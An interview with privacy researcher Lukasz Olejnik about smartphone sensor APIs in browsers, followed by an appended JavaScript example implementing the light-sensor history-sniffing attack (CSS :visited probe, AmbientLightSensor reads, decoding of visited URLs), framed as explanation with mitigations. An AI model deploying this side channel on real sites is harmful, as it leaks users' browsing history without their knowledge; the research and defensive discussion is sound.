What if the light sensor of your phone could hijack your web browser history?

Written by Olivier Desbiey


5 February 2018


Following his visit to our laboratory at the end of 2017, LINC interviewed Lukasz Olejnik about his recent work on the security of web browsers and smartphone sensors.

LINC: Lukasz, as a privacy and security researcher, consultant and W3C invited expert, what are the recent developments in web browsers that may impact users' privacy?

Lukasz Olejnik: Web browsers change all the time, with interesting new features added on a regular basis. We're not only speaking about implementations and user interfaces.

Web browsers are becoming very powerful. They are no longer limited to simple browsing. Soon, web browsers will allow websites to interact with the devices in the user's vicinity. This will be made possible thanks to new browser mechanisms, APIs. Web browsers will be able to use new communication channels such as NFC or Bluetooth. Additionally, websites will also be able to take advantage of low-level smartphone and laptop sensors such as light sensors, accelerometers or gyroscopes, and more. Learning about the user's environment will be within reach.

These features are either already present in some of the modern web browsers like Chrome, or will be implemented soon.

All this will certainly allow building very sophisticated and innovative web applications. But with this new power, it will be important to carefully design web browsers, as well as websites: being aware of the possible risks, and preferably trying to mitigate these risks in advance. These technologies and their use should be well analyzed for security and privacy issues, and when relevant, also from the digital ethics point of view.

Fortunately, at least the browser vendors are treating privacy with increasing care. In 2017 we even experienced an interesting precedent. The Firefox browser removed an entire API, the Battery Status API, which allowed reading battery information. This decision followed a long discussion of privacy concerns. It was my pleasure to take some part in this process.

LINC: Can you tell us a bit more about your research project on smartphone sensors and in particular what can be inferred by a simple light sensor, apparently innocuous and not related to personal data?

Lukasz Olejnik: I have been involved in security and privacy for about 10 years now, in research, industry, and regulation. In my research, I have assessed specifications, designs, and implementations. Recently, I put my focus on sensors. I analyzed a number of web APIs, and subsequently identified a number of possible privacy implications arising from certain uses of sensors on the web. Some of my analyses can be found on my blog. I'm happy with my contributions to W3C specifications.

As for the light sensor, the issue started with a discussion within the W3C working group. I had the feeling there was a need to demonstrate how the use of sensors may result in dealing with sensitive data. It so happens that one of the most indicative examples of web browser privacy issues is the ability to hijack web browser history. So why not show exfiltration of web browsing history using a light sensor? All the building blocks seemingly were there. Devices can be made to emit a varying level of light in response to displaying a link that was either visited or not. Subsequently, the light sensor reads the intensity of the reflected light. Ultimately, a website might identify whether external sites have been visited by the user in the past.

Returning to the second part of your question: I have opportunities to work on research and technologies, and also on regulation and policy aspects. Let's think outside the box for a moment. How are life patterns connected to personal data? We're speaking about behavioral information like mobility patterns, interaction with other people, possibly an insight into the user's possessions, and other types of behavior. Precise sensor reads can provide insight into reasoning about this kind of information. The protection of sensitive data, in particular behavioral profiles, is included even in the GDPR. Therefore, in specific contexts it might be a good idea to think about the relationship between the GDPR's broad definitions and system design. Potentially risky issues of this kind highlight not only the challenges related to web browsers but also the general challenges when assessing the privacy of systems or products. Perhaps sometimes even at the level of a data protection impact assessment, to ensure that control over data is maintained and that the systems are understood.

LINC: What solutions do you propose to limit privacy risks and misuse of data?

Lukasz Olejnik: The reality is that there are technical ways enabling the abuse of user data on the web. Users in general still cannot be sure that they are safe when performing a simple action such as clicking on a link. To protect yourself, we can speak about configuring web browsers in a special manner, or installing script or ad blockers. You can also consider installing a privacy-supporting web browser that has all this by default. You can also consider the protections offered by the frameworks of the GDPR or ePrivacy, the regulation I had the pleasure to work on.

But in the end, technology is for the people. All this control should be much easier. I believe technologies should be designed in a proper way, including both security and privacy engineering best practices. It’s not only about understanding the use cases. It is also about identifying the challenges - such as privacy risks. This means that the auditing of standards, systems, and technologies should preferably be done as early as possible.
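The exchange above describes the light-sensor history attack only in outline. The following is an added example written for this page, not Olejnik's own demonstration code: it shows the two halves of the channel he describes, a probe element whose colour depends on `:visited`, read back through the Generic Sensor `AmbientLightSensor` API, and the decoding logic that turns a noisy lux trace into a visited/not-visited decision per candidate URL. The URLs, slot length, noise margin and lux values are constructed for illustration; the sensor part assumes a browser that exposes `AmbientLightSensor`, so only the decoder runs outside a browser.

```javascript
// Added example (not from the interview). Constructed constants: each candidate
// URL is shown for one slot of SLOT_MS; slots with fewer than MIN_SAMPLES
// readings are treated as undecidable rather than guessed.
const SLOT_MS = 1000;
const MIN_SAMPLES = 3;

// Browser side. A single full-viewport <a> is restyled per candidate URL.
// Browsers restrict which properties :visited may change, but colour
// properties such as background-color are allowed, so a visited URL turns the
// screen bright and an unvisited one dark. The sensor then sees reflected light.
const PROBE_CSS = `
  #probe { display:block; width:100vw; height:100vh; }
  #probe:link    { background-color:#000; }
  #probe:visited { background-color:#fff; }
`;

// Assumes the Generic Sensor API (Chrome exposes it behind a flag). Each
// reading is delivered as {t: ms since start, lux: illuminance}.
function startSensor(onReading) {
  if (typeof AmbientLightSensor === 'undefined') {
    throw new Error('AmbientLightSensor API not available in this environment');
  }
  const sensor = new AmbientLightSensor();
  const t0 = Date.now();
  sensor.onreading = () => onReading({ t: Date.now() - t0, lux: sensor.illuminance });
  sensor.start();
  return sensor;
}

function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const m = s.length >> 1;
  return s.length % 2 ? s[m] : (s[m - 1] + s[m]) / 2;
}

// Lux values of readings with from <= t < to.
function luxIn(readings, from, to) {
  return readings.filter(r => r.t >= from && r.t < to).map(r => r.lux);
}

// Calibration: one slot with the probe forced dark, one forced bright.
// The decision threshold is the midpoint of the two medians.
function calibrate(readings, darkStart, brightStart, slotMs = SLOT_MS) {
  const dark = median(luxIn(readings, darkStart, darkStart + slotMs));
  const bright = median(luxIn(readings, brightStart, brightStart + slotMs));
  if (!(bright > dark)) throw new Error('calibration failed: screen not visible to sensor');
  return { dark, bright, threshold: (dark + bright) / 2 };
}

// One decision per candidate URL: true = visited, false = not visited,
// null = undecidable (too few samples, or median too close to the threshold).
function decodeVisited(readings, candidates, startMs, cal, slotMs = SLOT_MS) {
  const margin = (cal.bright - cal.dark) * 0.2; // constructed: 20% guard band
  const result = {};
  candidates.forEach((url, i) => {
    const from = startMs + i * slotMs;
    const lux = luxIn(readings, from, from + slotMs);
    if (lux.length < MIN_SAMPLES) { result[url] = null; return; }
    const m = median(lux);
    result[url] = Math.abs(m - cal.threshold) < margin ? null : m > cal.threshold;
  });
  return result;
}

// Constructed sensor trace: dark calibration at t=0, bright at t=1000, then
// four candidate slots from t=2000, with a few lux of hand-written noise.
const SAMPLE_CANDIDATES = [
  'https://example.org/a', 'https://example.org/b',
  'https://example.org/c', 'https://example.org/d',
];
const SAMPLE_READINGS = [
  { t: 100, lux: 10 }, { t: 400, lux: 12 }, { t: 700, lux: 9 },     // dark calibration
  { t: 1100, lux: 48 }, { t: 1400, lux: 52 }, { t: 1700, lux: 50 }, // bright calibration
  { t: 2100, lux: 49 }, { t: 2400, lux: 51 }, { t: 2700, lux: 50 }, // /a: bright -> visited
  { t: 3100, lux: 11 }, { t: 3400, lux: 10 }, { t: 3700, lux: 12 }, // /b: dark -> not visited
  { t: 4100, lux: 29 }, { t: 4400, lux: 31 }, { t: 4700, lux: 30 }, // /c: near threshold
  { t: 5500, lux: 50 },                                             // /d: too few samples
];

function demo() {
  const cal = calibrate(SAMPLE_READINGS, 0, 1000);
  return { cal, visited: decodeVisited(SAMPLE_READINGS, SAMPLE_CANDIDATES, 2000, cal) };
}
```

The decoder deliberately refuses to guess: a slot whose median lands inside the guard band, or that received too few readings, is reported as `null`. That matters for the threat, because the channel's bandwidth is bounded by how fast and how precisely the sensor reports, which is exactly why limiting sensor frequency and rounding illuminance values are effective mitigations for this class of attack.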

Lukasz Olejnik

Lukasz Olejnik is an independent security and privacy researcher and advisor. He specializes in web security and privacy, privacy engineering, privacy reviews and privacy impact assessments.



Illustration: Pixabay CC by Pexels


Article written by Olivier Desbiey, foresight studies officer